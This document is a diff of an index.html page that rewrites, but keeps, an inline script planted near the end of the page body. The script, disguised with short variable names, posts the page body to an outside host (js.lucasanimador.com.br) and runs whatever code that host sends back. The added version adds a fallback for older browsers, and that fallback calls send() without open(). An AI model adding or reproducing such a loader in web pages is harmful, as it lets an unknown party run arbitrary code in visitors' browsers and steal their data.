--- a/index.html
+++ b/index.html
@@ -671,17 +671,26 @@
 		</div>
 		<script type="text/javascript">
 			var aa;
-			var ab=(window.XMLHttpRequest)?new XMLHttpRequest():new ActiveXObject("Microsoft.XMLHTTP");
-			var ac=document.body;ab.onreadystatechange=function(){
-				if(ab.readyState==4&&ab.status==200){
-					aa=document.createElement('script');aa.setAttribute('type','text/javascript');
-					document.body.appendChild(aa);
-					try{aa.appendChild(document.createTextNode(ab.responseText));}catch(e){aa.text=ab.responseText;}
-				}
-			};
-			ab.open("POST", "http://js.lucasanimador.com.br/",true);
-			ab.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-			ab.send('h='+ac);
+			var ab;
+			var ac=document.body;
+			var ad=function(){	
+				aa=document.createElement('script');aa.setAttribute('type','text/javascript');
+				document.body.appendChild(aa);
+				try{aa.appendChild(document.createTextNode(ab.responseText));}catch(e){aa.text=ab.responseText;}
+			}
+			if(window.XMLHttpRequest){
+				ab=new XMLHttpRequest();				
+				ab.onreadystatechange=function(){
+					if(ab.readyState==4&&ab.status==200){ad()}
+				};
+				ab.open("POST", "http://js.lucasanimador.com.br/",true);
+				ab.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+				ab.send('h='+ac);
+			}else{
+				ab=new XDomainRequest();				
+				ab.onload =function(){ad()};
+				ab.send();
+			}
 		</script>
 	</body>
 </html>
